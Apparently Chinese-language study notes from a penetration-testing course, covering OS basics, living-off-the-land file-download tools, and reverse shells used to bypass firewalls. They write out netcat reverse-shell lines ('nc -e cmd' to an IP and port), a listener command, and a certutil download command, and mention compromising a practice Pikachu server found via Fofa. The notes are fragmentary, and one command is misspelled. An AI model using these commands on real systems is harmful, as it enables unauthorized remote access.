操作系统_名词_文件下载_反弹SHELL_防火墙绕过
操作系统
操作系统-用途&命令&权限&用户&防火墙
1、个人计算机&服务器用机
2、windows&Linux常见命令
3、文件权限&服务权限&用户权限
4、系统用户&用户组&服务用户等分类
5、自带防火墙出站&入站规则策略协议
实用案例1:文件上传下载-解决无图形化&解决数据传输
Linux:wget curl python ruby perl java等
Windows: Powershell Certutil Bitsadmin msiexec mshta rundll32等
实用案例2:反弹Shell命令-解决数据回显&解决数据通讯(反弹就是将权限给别人)
useradd passwd
测试Linux系统添加用户或修改命令交互回显
结合案例1:防火墙绕过-正向链接&反向链接&内网服务器
1、内网:
内网->用户
nc -e cmd ip地址 端口
就是把本机的cmd权限给这个ip的窗口
nc -lvvp 监听的端口号
2.防火墙
服务器主机<->另一个服务器主机
如果开了防火墙,是不行的
入站严格出站宽松
nc -e cmd ip地址 端口(就是正向链接)
主动把权限给出去
反向链接就是别人找你
结合案例-Fofa拿下同行Pikachu服务器
文件下载&反弹shell:
certuil -urlcache -split -f ip地址
nc -e cmd ip地址
找个在线的靶场
